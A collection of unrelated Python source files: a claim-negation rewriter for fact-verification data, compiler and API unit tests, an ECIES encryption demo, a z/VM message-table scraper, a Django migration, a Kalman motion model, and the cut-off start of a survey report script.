new_claim = "There exists no {0} called {1}.".format(matches1.group(2).replace(".", ""), matches1.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "there.exists.no.a.called"
class IsAReplacementRule3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) is a (.+)", instance["claim"])
matches2 = re.match(r"(.+) is an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There does not exist a {0} that goes by the name of {1}.".format(matches1.group(2).replace(".",""),matches1.group(1))
else:
new_claim = "There does not exist an {0} that goes by the name of {1}.".format(matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "there.not.exist.named"
class IsAReplacementRule4(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) is a (.+)", instance["claim"])
matches2 = re.match(r"(.+) is an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There is not a {0} called {1}.".format(matches1.group(2).replace(".",""),matches1.group(1))
else:
new_claim = "There is not an {0} called {1}.".format(matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "there.is.not.called"
class IsAReplacementRule5(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) is a (.+)", instance["claim"])
matches2 = re.match(r"(.+) is an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There is not a {0} that goes by the name of {1}.".format(matches1.group(2).replace(".",""),matches1.group(1))
else:
new_claim = "There is not an {0} that goes by the name of {1}.".format(matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "there.is.not.by.name"
class WasAReplacementRule1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) was a (.+)", instance["claim"])
matches2 = re.match(r"(.+) was an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There did not exist a {0} called {1}.".format(matches1.group(2).replace(".", ""),
matches1.group(1))
else:
new_claim = "There did not exist an {0} called {1}.".format(matches2.group(2).replace(".", ""),
matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "was.there.does.not.exist.a.called"
class WasAReplacementRule2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) was (?:a|an) (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There existed no {0} called {1}.".format(matches1.group(2).replace(".", ""), matches1.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "was.there.exists.no.a.called"
class WasAReplacementRule3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) was a (.+)", instance["claim"])
matches2 = re.match(r"(.+) was an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There did not exist a {0} that goes by the name of {1}.".format(
matches1.group(2).replace(".", ""), matches1.group(1))
else:
new_claim = "There did not exist an {0} that goes by the name of {1}.".format(
matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "was.there.not.exist.named"
class WasAReplacementRule4(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) was a (.+)", instance["claim"])
matches2 = re.match(r"(.+) was an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There was not a {0} called {1}.".format(matches1.group(2).replace(".", ""), matches1.group(1))
else:
new_claim = "There was not an {0} called {1}.".format(matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "was.there.is.not.called"
class WasAReplacementRule5(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) was a (.+)", instance["claim"])
matches2 = re.match(r"(.+) was an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There was not a {0} that went by the name of {1}.".format(matches1.group(2).replace(".", ""),
matches1.group(1))
else:
new_claim = "There was not an {0} that went by the name of {1}.".format(matches2.group(2).replace(".", ""),
matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "was.there.is.not.by.name"
class DirectedBy1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is)? directed by (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a movie called {0} which is not directed by {1}.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "directedby1"
class DirectedBy2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is)? directed by (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a movie called {0} which wasn't directed by {1}.".format(
matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "directedby2"
class DirectedBy3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is)? directed by (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a movie called {0}, {1} has no involvement in the production.".format(
matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "directedby3"
class DirectedBy4(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is)? directed by (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a director, {0}, who was not involved in the production of {1}.".format(matches1.group(2).replace(".", ""), matches1.group(1).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "directedby4"
class DirectedBy5(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is)? directed by (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a person involved in the movie industry, {0}, who was not the director of {1}.".format(matches1.group(2).replace(".", ""), matches1.group(1).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "directedby5"
class StarredIn1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:starred|stars) in (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a person, {0}, that starred in {1}.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
instance["claim"] = new_claim
return instance
def name(self):
return "starredin1"
class StarredIn2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:starred|stars) in (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a person, {0}, that did not take a leading acting role in {1}.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "starredin2"
class StarredIn3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:starred|stars) in (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a person, {0}, that did not appear in {1}.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "starredin3"
class StarredIn4(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:starred|stars) in (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "There is a person, {0}, that had no role in {1}.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "starredin4"
class American(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) an American (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
new_claim = "{0} {1} that originated from outside the United States.".format(matches1.group(1).replace(".", ""), matches1.group(2).replace(".", ""))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "american"
class Birth1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is) born (?:in|on)? (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "There exists a place, {1}, that was not the birthplace of the person {0}.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is not the approximate time at which the person {0} was born.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "birth1"
class Birth2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is) born (?:in|on)? (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "There exists a place, {1}, that is not where the person {0} started living.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is not the approximate time at which the person {0} started living.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "birth2"
class Birth3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is) born (?:in|on)? (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "{0} was born in some other place than {1}.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{0} was born at some other time than {1}.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "birth3"
class Birth4(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) (?:was|is) born (?:in|on)? (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "{1} is some place other than where the person {0} was born.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is some other time than when {0} was born.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "birth4"
class Death1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) died (?:in|on) (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "{1} is somewhere other than the place where the person {0} became deceased.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is some other time than when the person {0} became deceased.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "death1"
class Death2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) died (?:in|on) (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "There exists a place, {1}, that is not the place where the person {0} died.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is not the when the person {0} died.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "death2"
class Death3(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) died (?:in|on) (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
doc = nlp(instance["claim"])
is_place = any([e.label_ in ["GPE","LOC"] for e in doc.ents])
is_time = any([e.label_ in ["TIME","DATE","ORDINAL", "CARDINAL"] for e in doc.ents])
if is_place and not is_time:
new_claim = "There exists a place, {1}, that is not the place where the person {0} took their final breath.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
elif is_time and not is_place:
new_claim = "{1} is not the approximate time at which the person {0} took their final breath.".format(matches1.group(1).replace(".", ""),
matches1.group(2).replace(".", ""))
else:
return None
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "death3"
class ClaimRewriter:
def __init__(self, out_dir):
self.replacement_rules = [IsAReplacementRule1(),
IsAReplacementRule2(),
IsAReplacementRule3(),
IsAReplacementRule4(),
IsAReplacementRule5(),
WasAReplacementRule1(),
WasAReplacementRule2(),
WasAReplacementRule3(),
WasAReplacementRule4(),
WasAReplacementRule5(),
DirectedBy1(),
DirectedBy2(),
DirectedBy3(),
DirectedBy4(),
DirectedBy5(),
American(),
Birth1(),
Birth2(),
Birth3(),
Birth4(),
Death1(),
Death2(),
Death3()
]
self.changed_files = {rule:open(out_dir+"/changed."+rule.name()+".jsonl","w+") for rule in self.replacement_rules}
self.unchanged_files = {rule:open(out_dir+"/unchanged."+rule.name()+".jsonl","w+") for rule in self.replacement_rules}
def process_claim(self, claim):
for rule in self.replacement_rules:
rep_claim = rule.process_instance(deepcopy(claim))
if rep_claim is not None:
self.unchanged_files[rule].write(json.dumps(claim)+"\n")
self.changed_files[rule].write(json.dumps(rep_claim)+"\n")
with open(args.in_file) as f:
rewriter = ClaimRewriter(args.out_dir)
for line in tqdm(f):
line = json.loads(line)
rewriter.process_claim(line)
out_dir_name = args.out_dir.split("/")[-1]
with open("generated3.sh","w+") as f:
for rule in rewriter.replacement_rules:
f.write("bash scripts/run_oracle.sh {0} changed.{1}.jsonl".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_oracle.sh {0} unchanged.{1}.jsonl".format(out_dir_name, rule.name()))
f.write("\n")
for rule in rewriter.replacement_rules:
f.write("bash scripts/run_full.sh {0} changed.{1}.jsonl".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_full.sh {0} unchanged.{1}.jsonl".format(out_dir_name, rule.name()))
f.write("\n")
for rule in rewriter.replacement_rules:
f.write("echo {0} changed.oracle.{1} >> oracle_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_scoring_oracle.sh {0} changed.{1}.jsonl >> oracle_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("echo {0} unchanged.oracle.{1} >> oracle_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_scoring_oracle.sh {0} unchanged.{1}.jsonl >> oracle_scores".format(out_dir_name, rule.name()))
f.write("\n")
for rule in rewriter.replacement_rules:
f.write("echo {0} changed.full.{1} >> full_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_scoring_full.sh {0} changed.{1}.jsonl >> full_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("echo {0} unchanged.full.{1} >> full_scores".format(out_dir_name, rule.name()))
f.write("\n")
f.write("bash scripts/run_scoring_full.sh {0} unchanged.{1}.jsonl >> full_scores".format(out_dir_name, rule.name()))
f.write("\n")
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
import unittest
# TODO: No idea why pytype cannot find names from this module.
# pytype: disable=name-error
from pyiree.compiler2.tf import *
if not is_available():
print(f"Skipping test {__file__} because the IREE TensorFlow compiler "
f"is not installed")
sys.exit(0)
import tensorflow as tf
class SimpleArithmeticModule(tf.Module):
@tf.function(input_signature=[
tf.TensorSpec([4], tf.float32),
tf.TensorSpec([4], tf.float32)
])
def simple_mul(self, a, b):
return a * b
@tf.function(input_signature=[
tf.TensorSpec([128, 3072], tf.float32),
tf.TensorSpec([3072, 256], tf.float32),
])
def simple_matmul(self, a, b):
return tf.matmul(a, b)
# TODO(laurenzo): More test cases needed (may need additional files).
# Specifically, figure out how to test v1 models.
class TfCompilerTest(tf.test.TestCase):
def testImportSavedModel(self):
import_mlir = compile_saved_model(self.smdir,
import_only=True).decode("utf-8")
self.assertIn("func @simple_matmul", import_mlir)
def testCompileSavedModel(self):
binary = compile_saved_model(self.smdir,
target_backends=DEFAULT_TESTING_BACKENDS)
logging.info("Compiled len: %d", len(binary))
self.assertIn(b"simple_matmul", binary)
self.assertIn(b"simple_mul", binary)
def testCompileModule(self):
binary = compile_module(self.m, target_backends=DEFAULT_TESTING_BACKENDS)
logging.info("Compiled len: %d", len(binary))
self.assertIn(b"simple_matmul", binary)
self.assertIn(b"simple_mul", binary)
@classmethod
def setUpClass(cls):
cls.m = SimpleArithmeticModule()
cls.tempdir = tempfile.TemporaryDirectory()
cls.smdir = os.path.join(cls.tempdir.name, "arith.sm")
tf.saved_model.save(
cls.m,
cls.smdir,
options=tf.saved_model.SaveOptions(save_debug_info=True))
@classmethod
def tearDownClass(cls):
cls.tempdir.cleanup()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
tf.test.main()
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from mo.utils.error import classify_error_type
class TestingErrorClassifier(unittest.TestCase):
def test_no_module(self):
message = "No module named 'openvino.offline_transformations.offline_transformations_api'"
self.assertEqual(classify_error_type(message), message)
def test_no_module_neg(self):
message = "No module 'openvino'"
self.assertEqual(classify_error_type(message), "undefined")
def test_cannot_import_name(self):
message = "cannot import name 'IECore' from 'openvino.inference_engine' (unknown location)"
self.assertEqual(classify_error_type(message), "cannot import name 'IECore'")
def test_cannot_import_name_neg(self):
message = "import name 'IECore' from 'openvino.inference_engine' (unknown location)"
self.assertEqual(classify_error_type(message), "undefined")
|
import requests
from unittest import TestCase
from . import BASE_URL, test_token, test_config
url = BASE_URL + '/snapshot/add'
class TestAddSnapshot(TestCase):
def test_post_working(self):
"""
this test will pass the snapshot/add method
"""
payload = {
"token": test_token,
"config": test_config
}
output = requests.post(url, json=payload)
expected_output = 'snapshot created successfully'
assert output.json()['message'] == expected_output
def test_post_missing_parameter(self):
"""
this test will fail because of missing parameters
"""
payload = {
"tokfadsfasden": test_token,
"config": test_config
}
output = requests.post(url, json=payload)
expected_status = '531'
assert output.json()['error']['status'] == expected_status
def test_post_user_unidentified(self):
"""
this test will fail because the used token is wrong
"""
payload = {
"token": 'toto',
"config": test_config
}
output = requests.post(url, json=payload)
expected_status = '539'
assert output.json()['error']['status'] == expected_status
|
from ecies.utils import generate_eth_key, generate_key
from ecies import encrypt, decrypt
eth_k = generate_eth_key()
sk_hex = eth_k.to_hex() # hex string
pk_hex = eth_k.public_key.to_hex() # hex string
data = b'this is a test'
encrypt_str = encrypt(pk_hex, data)
print(encrypt_str)
decrypt_str = decrypt(sk_hex, encrypt_str)
print(decrypt_str)
secp_k = generate_key()
sk_bytes = secp_k.secret # bytes
pk_bytes = secp_k.public_key.format(True) # bytes
encrypt_str = encrypt(pk_bytes, data)
print(encrypt_str)
decrypt_str = decrypt(sk_bytes, encrypt_str)
print(decrypt_str)
|
#!/usr/bin/python3
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import json
import os
import sys
from lxml import etree
from selenium import webdriver
# Should be within the "z/VM: Systems Management Application Programming" guide
URL = "https://www.ibm.com/support/knowledgecenter/en/SSB27U_7.1.0/com.ibm.zvm.v710.dmse6/sok.htm"
# Refresh saved copies of pages if asked
if len(sys.argv) > 1 and sys.argv[1] == "refresh":
# Use the (deprecated) PhantomJS driver for now...it's the easiest by far
driver = webdriver.PhantomJS()
# Get the list of functions
driver.get(URL)
# Extract the functions and links
fns = {}
items = driver.find_elements_by_xpath("//li[@title='Socket Application Programming Interfaces']/ul[@role='group']/li[contains(@class, 'kc-toc-item')]//a")
for a in items:
fns[a.get_attribute("aria-label").strip()] = a.get_attribute("href").strip()
# Get the page and save the content frame
for fn, href in fns.items():
print(f"Getting {fn}")
driver.get(href)
driver.switch_to.frame("kcframe")
open(f"content/{fn}", "w").write(driver.page_source)
# Must use the HTML parser
parser = etree.HTMLParser()
db = {}
# Process the saved pages
for path in glob.glob("content/*"):
# Load the page
root = etree.parse(open(path), parser)
# Locate the "Return and Reason Code" header
e = root.xpath("//section/h2[text()='Return and Reason Codes']")
# Nagivate to its parent
p = e[0].getparent()
# Extract the function name from the path
fn = os.path.basename(path).split(".")[0]
print(f"Processing {fn}")
# Locate all rows within the section
rows = p.xpath(".//tr")
# Prepare
rc = None
rs = None
et = None
db[fn] = {}
# process each row
for row in rows:
# Extracts assembled text fragments from node
def gettext(node):
t = ""
tails = []
# Scan node and all children for text
for e in node.iter():
if e.text is None and e.tail is None:
pass
elif e.text is None and e.tail is not None:
tails.append(e.tail)
elif e.text is not None and e.tail is None:
# Quote fragment if it falls at the start of the text or
# accumulated text ends with whitespace
if not t or (t and t[-1] in [" ", "\n"]):
t += f"'{e.text}'"
else:
t += e.text
if len(tails) > 1:
t += tails.pop()
elif e.text is not None and e.tail is not None:
# Quote fragment if the accumulated text ends with whitespace
if t and t[-1] in [" ", "\n"]:
t += f"'{e.text}'"
else:
t += e.text
tails.append(e.tail)
# Append any remaining fragments to accumulated text
if len(tails) > 0:
t += "".join(tails)
t = " ".join(t.replace("\n", " ").replace('"', "'").split()).strip(".")
# Get rid of quotes if entire text is quoted
if t and t[0] == "'" and t[-1] == "'":
t = t.strip("'")
return t
# Locate all the columns
cols = row.xpath("./td")
if len(cols) == 0:
continue
# Get the return code or reuse previous is this column is blank
tc = gettext(cols[0])
if tc != "":
rc = tc
# Get the reason code or reuse previous is this column is blank
tc = gettext(cols[2])
if tc != "":
rs = f"_{tc}" if tc.isdigit() else ""
# Get the message text
et = gettext(cols[4])
# Store it in the DB
db[fn][f"{rc}{rs}"] = et
s = json.dumps(db, indent=4)
print(s)
with open("pysmapi/messages.py", "w") as f:
f.write(f"# Automatically generated by {os.path.basename(sys.modules[__name__].__file__)}\n\n")
f.write(f"msgdb = \\\n")
f.write(s)
|
# Generated by Django 3.1.7 on 2021-06-16 16:37
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Config',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app', models.TextField()),
('name', models.TextField()),
('is_enabled', models.BooleanField(default=True)),
],
options={
'db_table': 'django_command_disable',
'ordering': ('app', 'name'),
},
),
migrations.AddIndex(
model_name='config',
index=models.Index(fields=['app'], name='django_comm_app_4f7ac8_idx'),
),
migrations.AddIndex(
model_name='config',
index=models.Index(fields=['name'], name='django_comm_name_b1047f_idx'),
),
migrations.AddIndex(
model_name='config',
index=models.Index(fields=['is_enabled'], name='django_comm_is_enab_1cfeb4_idx'),
),
]
|
"""
"""
# Build In
from argparse import ArgumentParser
# Installed
import numpy as np
# Local
from . import Model, MOTION_MODELS
def init_constant_accumulation_parser(parents=[]):
parser = ArgumentParser(
parents=parents,
description='Arguments for a Constant Accumulation model'
)
parser.add_argument('--x_dim', type=int, metavar='INT', default=4)
parser.add_argument('--z_dim', type=int, metavar='INT', default=2)
parser.add_argument('--pos_idx', type=int, metavar='TUPLE', nargs='*', default=(0,1))
parser.add_argument('--vel_idx', type=int, metavar='TUPLE', nargs='*', default=(2,3))
parser.add_argument('--acl_idx', type=int, metavar='TUPLE', nargs='*', default=None)
parser.add_argument('--rot_idx', type=int, metavar='TUPLE', nargs='*', default=None)
parser.add_argument('--template', type=str, metavar='STRING', default='KalmanTracker')
parser.add_argument('--vel', type=float, metavar='FLOAT', default=1.0)
parser.add_argument('--acl', type=float, metavar='FLOAT', default=0.125)
parser.add_argument('--rot', type=float, metavar='FLOAT', default=0.0)
return parser
class ConstantAccumulation(Model):
"""
"""
def __init__(self, parse=None, **kwargs):
"""
"""
def parse_kwargs(
x_dim=3,
z_dim=1,
pos_idx=(0,),
vel_idx=(1,),
rot_idx=None,
acl_idx=None,
vel=1.0,
acl=0.125,
rot=0.0,
prediction_model='KalmanTracker',
label=None,
**kwargs
):
self.label = label
self.x_dim = x_dim
self.z_dim = z_dim
self.u_dim = 0
self.F = np.eye(x_dim)
self.H = np.eye(z_dim, x_dim)
self.P = np.eye(x_dim) * 10
self.P[z_dim:] *= 1000
self.Q = np.eye(x_dim)
self.Q[z_dim:] *= 0.015625
self.prediction_model = prediction_model
self.motion_model = 'ConstantAccumulation'
if vel_idx:
self.F[pos_idx, vel_idx] = vel
if acl_idx:
self.F[vel_idx, acl_idx] = acl
if rot_idx:
self.F[vel_idx, rot_idx] = rot
pass
if parse is not None and len(parse):
parser = init_constant_accumulation_parser()
args, _ = parser.parse_known_args(parse)
for k,v in kwargs.items():
args.__setattr__(k,v)
parse_kwargs(**args.__dict__)
else:
parse_kwargs(**kwargs)
pass
pass
MOTION_MODELS['ConstantAccumulation'] = ConstantAccumulation |
#!/usr/bin/env python
from __future__ import division, print_function
import argparse,sys,os
import random
from collections import Counter
from matplotlib import pyplot as plt
import wordcloud
from wordcloud import WordCloud
import pandas as pd, numpy as np
from IPython.display import display, HTML
from weasyprint import HTML as weasyHTML
def is_nan(x):
try: return np.isnan(x)
except: return False #isnan only eats strings
def reformat_answer(answer):
if is_nan(answer):
answer = 'No answer given.'
else:
answer = str(answer)
#if type(answer) in (int, float):
# answer = str(answer)
return answer
def reformat_question(question,instructor_name):
question = question.replace("[InstructorName]", instructor_name)
if u'\xa0' in question:
question = question.replace(u'\xa0', u' ') #Corrects for unicode encoding error
return question
# from itertools docs
def random_permutation(iterable, r=None):
"Random selection from itertools.permutations(iterable, r)"
